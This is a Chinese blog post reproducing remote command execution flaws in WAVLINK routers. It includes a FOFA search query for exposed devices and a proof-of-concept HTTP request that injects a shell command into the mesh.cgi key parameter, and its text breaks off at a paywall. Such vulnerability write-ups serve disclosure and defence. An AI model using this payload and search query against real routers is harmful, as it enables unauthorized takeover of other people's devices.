wavlink 路由器 多处前台RCE漏洞复现

最新推荐文章于 2024-09-12 20:56:31 发布
最新推荐文章于 2024-09-12 20:56:31 发布
阅读量1.2k 收藏 9
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135137861
版权
本文详细介绍了WAVLINK路由器在mesh.cgi、nightled.cgi、live-api.cgi等多个接口存在的命令执行漏洞,涉及WN530HG4、WN531G3等型号。复现环境中,攻击者能利用此漏洞获取服务器权限。官方已提供修复方案,建议用户及时联系厂商更新,并通过防火墙等措施限制不必要的公网访问。
摘要由CSDN通过智能技术生成

 0x01 产品简介

WAVLINK是中国睿因科技(WAVLINK)公司开发的一款路由器。

0x02 漏洞概述

WAVLINK路由器mesh.cgi、nightled.cgi、live-api.cgi等接口处存在命令执行漏洞,攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。

0x03 复现环境

FOFA:icon_hash="-1350437236"

0x04 漏洞复现

PoC-1

POST /cgi-bin/mesh.cgi?page=upgrade&key=';id>./2.txt;' HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/60
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
漏洞复现】睿因科技-wavlink-路由器-多处前台RCE
知黑而守白
01-05 408
睿因(wavlink路由器,cgi-bin下的多处接口存在命令执行漏洞,允许攻击者通过构造特制的请求包执行系统命令,从而获取未授权的访问权限。攻击者可以利用这个漏洞来获取敏感信息、篡改配置,甚至导致网络和设备的不可预测的损害。睿因(wavlink)是一个国际知名品牌,其营销总部设立在中国香港,生产总部位于中国深圳。睿因(wavlink)以高科技和人性化为出发点,围绕PC及移动设备的周边,提出了无线、网络、数码、影音、多显示等解决方案。
漏洞复现Wavlink路由器远程命令执行漏洞
失心少年
01-09 625
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!睿因科技Wavlink路由器存在远程命令执行漏洞,通过此漏洞攻击者可执行任意命令,如写入木马文件,远程控制路由器执行id命令,并将执行结果写入到路由器中。
Wavlink路由器远程命令执行漏洞(含批量验证poc),大牛整理
04-15 305
睿因科技Wavlink路由器存在远程命令执行漏洞,通过此漏洞攻击者可执行任意命令,如写入木马文件,远程控制路由器
D-Link DAR-8000操作系统命令注入漏洞(CVE-2023-4542)
weixin_44304678的博客
11-03 453
D-Link DAR-8000是中国友讯(D-Link)公司的上网行为审计网关。该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。D-Link DAR-8000-10版本存在操作系统命令注入漏洞
Wavlink路由器远程命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-04 77
Wavlink路由器远程命令执行漏洞(含批量验证poc)
Wavlink 路由器攻击链
无问社区的博客
08-19 562
Wavlink 路由器是一款国产的网络通讯设备,2020 年公布了其内部存在的信息泄露漏洞,只要访问对应路由,即可下载相关的配置文件,然后利用统一秘钥进行解密即可获得用户名与密码。在最新的研究中,发现其存在的需要授权的命令注入漏洞,结合前期的信息泄露漏洞,可以实现对设备的未授权攻击。
wavlink 路由器 live_api 远程命令执行漏洞
01-01
wavlink路由器live_api存在远程命令执行漏洞。该漏洞允许攻击者通过远程发送恶意请求的方式来执行任意命令,从而获取敏感信息或者对系统造成破坏。攻击者可利用此漏洞进行网络入侵、窃取数据或者进行其他恶意活动。 ...
AI在医学领域:医学AI的安全与隐私全面概述
最新发布
声纹感知 洞察芯声
09-12 1262
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1228
本文主要介绍网络安全认识与学习规划
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 1028
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 810
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 378
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
个人信息记录安全:守护数字时代的隐私堡垒
大厂全栈码农
09-09 1509
同时,也强调了个人在保护自身信息方面的意识与行为的重要性,最后对个人信息记录安全的未来发展趋势进行了展望,旨在为构建更安全的个人信息环境提供全面且深入的思考。此外,在移动互联网时代,个人信息还存在于各种移动应用程序中,从社交软件、购物应用到金融理财 APP 等,这些应用在为用户提供便捷服务的同时,也收集和存储了大量的个人信息。例如,一些电商平台在用户浏览商品时,收集了大量与购物无关的个人信息,如地理位置、设备信息等,并将这些信息用于精准营销,甚至在用户不知情的情况下将信息共享给其他第三方公司。
企业应该如何安全上网,软件防查盗版,企业防盗版
cnsinda_htt的博客
09-12 363
SPN(Sandbox Proxy Network)反向沙盒安全上网解决方案,是直接把终端传统外网物理断开,然后在内网中部署一个沙盒安全上网网关主机,在需要访问外网的终端上安装一个沙盒,当需要访问互联网的时候,在这个隔离沙盒内访问互联网。当需要访问互联网时,用户可以在这个隔离沙盒内进行操作,确保主机本机和互联网物理隔离,只有沙盒能访问互联网,而沙盒和本机是完全隔离的。SPN沙盒安全上网解决方案为企业提供了一个安全、可靠的上网环境,帮助企业在信息化时代有效应对各种网络安全威胁,保障企业的核心数据和信息安全
GORM安全-保护你的应用免受SQL注入攻击
一起coding,一起嗨。
09-12 525
GORM安全-保护你的应用免受SQL注入攻击
网络安全宣传周 | DNS安全威胁与应对措施分享
weixin_53018687的博客
09-12 885
然而,DNS协议在设计初期只注重功能的实现,未充分考虑安全验证机制,缺乏有效的安全防御手段,DNS协议数据包往往能够在网络中畅通无阻,为攻击者提供了可乘之机,这一天生的设计缺陷使得DNS系统天然地成为了安全领域的薄弱环节。DNS劫持:DNS劫持是指攻击者通过篡改DNS解析结果,将用户的流量重定向到不同的IP地址,通常是恶意网站。DNS泛洪攻击:DNS洪泛攻击是一种拒绝服务攻击,攻击者通过发送大量的DNS请求,通常是伪造的或毫无意义的查询,消耗DNS服务器的资源,使其无法响应合法的查询请求。
Siri因ChatGPT-4o升级:我们的个人信息还安全吗?
m0_65134936的博客
09-12 1025
随着人工智能技术的不断进步,智能语音助手如Siri、Alexa、Google Assistant等已成为我们生活的一部分。这些助手通过自然语言处理(NLP)技术与用户互动,提供更加个性化的服务。近期,ChatGPT-4o的引入为Siri带来了全新的功能和体验,但同时也引发了公众对于个人信息安全的深切关注。ChatGPT-4o的运行依赖于强大的数据中心和先进的计算机处理能力。当用户通过Siri与ChatGPT-4o交互时,每一次对话都会被发送到OpenAI的服务器进行处理。
深入解析反射型 XSS 与存储型 XSS:原理、危害与防范
2301_77160226的博客
09-05 859
反射型 XSS 和存储型 XSS 都是常见的 XSS 攻击类型,它们的原理和危害有所不同,但都可以对用户造成严重的危害。为了防范 XSS 攻击,我们需要采取一系列的措施,如输入验证和过滤、输出编码、使用安全的 API 和框架等。同时,我们也需要教育用户提高安全意识,不要点击来自不可信来源的链接,不要在不可信的网站上输入敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值